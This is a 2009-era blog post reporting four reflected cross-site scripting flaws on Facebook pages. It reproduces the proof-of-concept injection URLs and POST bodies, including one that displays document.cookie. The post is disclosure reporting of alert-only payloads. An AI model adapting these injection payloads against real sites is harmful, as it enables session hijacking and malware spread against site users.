Search for
Login | Username Password Forgot? | Email: | Create Account
Technology / Internet | Entries: 319 | Views: 4973 | Modified: 3 months ago | | Add to My Feeds
Report
Facebook's new homepage features a login form ...
Image via Wikipedia

If I have mentioned some security flaw that Facebook ever faced , like how to view facebook private profile pictures , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I’m pretty sure there will be more facebook xss hacking in 2009 . Some major facebook xss vulnerabilities has been published on Xssed.com (the most well-known website for xss news). And of course , you’re very allowed to leave this post if you still think Xss is not dangerous at all :) . Some critical Facebook Xss flaws can infect million facebook members with malware. And it’s not impossible for a new facebook xss worm to be developed under these circumstances.

The first Facebook xss vulnerability was occured on facebook reset password page :
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror : http://www.xssed.com/mirror/55951/

The 2nd : (with POST)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd :
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th : (with POST)
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=


More from แนวคิดใหม่ในแบบคาสิโนออนไลน์

Browser Fuzzer 2 09 Jan 28
Facebook hack 2009 09 Jan 7

^ Back To Top